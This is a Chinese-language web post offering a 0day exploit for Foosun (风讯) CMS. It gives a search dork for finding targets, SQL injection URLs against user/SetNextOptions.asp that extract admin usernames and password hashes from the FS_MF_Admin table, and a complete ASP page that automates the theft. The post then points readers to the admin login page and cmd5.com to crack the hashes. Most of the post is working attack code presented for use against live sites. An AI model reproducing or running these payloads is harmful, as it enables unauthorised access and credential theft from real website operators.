风讯CMS 0day exploits

关键字: inurl:User/Reg_service.asp
风讯的注册页面...
漏洞页面:/user/SetNextOptions.asp
利用方法:
构造注入
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
“admin_name”管理用户名数据库表
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
“admin_pass_word”管理密码数据库表
把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了

 

<herd>
<title>foosun cms 0day exploits</title>
</herd>
<body>
<%web=request("web")id=request("id")%>关键字:会员注册step 1 of 4 step<br>
<form action='' method=post>输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br>要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br><input type=submit value="我要暴"></form>
<form><% function bin2str(bin)        dim tmp,ustr        tmp=""        for i=1 to LenB(bin)-1            ustr=AscB(MidB(bin,i,1))            if ustr>127 then                i=i+1                tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))            else                tmp=tmp&chr(ustr)            end if        next        bin2str=tmp    end functionwebuser=web&"User/setnextoptions.asp?ode>EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&idwebpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&idif web="" thenelseset x=server.createObject("Microsoft.XMLHTTP")    x.open "get",webuser,false    x.send    str=bin2str(x.responseBody)response.write "你暴的网站地址:"&web&"<br><br>第"&id&"位的管理员<br>"response.write "<br>
<a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>"for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write "<br>------------------<br>帐号:"&mid1&"<br>"x.open "get",webpass,false    x.send    str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write "<br>密码:"&mid2&"<br>------------------<br>" response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>"    set x=nothingend if%>
具体的利用方法请参考源码。

发表评论